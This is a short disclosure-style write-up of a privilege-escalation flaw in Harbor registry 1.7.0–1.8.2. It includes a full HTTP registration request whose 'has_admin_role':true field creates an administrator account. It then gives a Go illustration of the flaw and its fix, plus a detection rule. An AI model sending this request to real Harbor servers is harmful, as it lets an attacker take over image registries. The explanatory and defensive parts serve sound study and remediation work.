Harbor is an enterprise-grade registry server for storing and distributing Docker images. In Harbor versions 1.7.0 through 1.8.2, the file core/api/user.go contains a security vulnerability: by adding one key parameter to the user-registration request, an attacker can create an administrator account and thereby take over the Harbor image registry.

    POST /api/users HTTP/1.1
    Host: x.x.x.x:8080
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
    Accept: application/json
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/json
    Cache-Control: no-cache
    Pragma: no-cache
    Connection: close
    Referer: http://x.x.x.x:8080/
    Content-Length: 133

    {"username":"hw","email":"test@test.cn","realname":"hw","password":"Admin123","comment":"1","has_admin_role":true,"t0f9phmw4j":"="}

    [screenshot: the administrator account was added successfully]
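The bug class behind this request is mass assignment: the server copies `has_admin_role` from a self-registration body into the new user record. The Go example below is added here and is not Harbor's code; the request struct, the function names and the `callerIsAdmin` flag (standing in for the server's session check) are assumptions. It decodes the captured body and contrasts the unchecked copy with a version that honours the flag only for an authenticated administrator.

```go
package main

import (
	"encoding/json"
	"fmt"
)

// Fields a client may send in the JSON body of POST /api/users (assumed shape,
// modelled on the captured request above, not Harbor's own struct).
type userCreateRequest struct {
	Username     string `json:"username"`
	Email        string `json:"email"`
	HasAdminRole bool   `json:"has_admin_role"`
}

// Stored record; whether a user is an admin must be decided server-side.
type User struct {
	Username     string
	HasAdminRole bool
}

// decodeUserCreate parses the body. Unknown keys such as the random
// "t0f9phmw4j" in the captured request are silently ignored by encoding/json,
// so they play no part in the bug; only has_admin_role matters.
func decodeUserCreate(body []byte) (userCreateRequest, error) {
	var req userCreateRequest
	err := json.Unmarshal(body, &req)
	return req, err
}

// createUserVulnerable copies the flag straight from the body: any caller
// who adds "has_admin_role":true registers as an administrator.
func createUserVulnerable(req userCreateRequest) User {
	return User{Username: req.Username, HasAdminRole: req.HasAdminRole}
}

// createUserFixed honours has_admin_role only when the authenticated caller
// is already an administrator. callerIsAdmin is an assumed stand-in for the
// session check; an unauthenticated self-registration that asks for the
// flag is rejected, so privilege cannot be self-granted.
func createUserFixed(req userCreateRequest, callerIsAdmin bool) (User, error) {
	if req.HasAdminRole && !callerIsAdmin {
		return User{}, fmt.Errorf("has_admin_role may only be set by an administrator")
	}
	return User{Username: req.Username, HasAdminRole: req.HasAdminRole}, nil
}
```

Detection-wise, the same rule gives a log signal: a POST to /api/users whose body carries `has_admin_role` from an unauthenticated session is never legitimate.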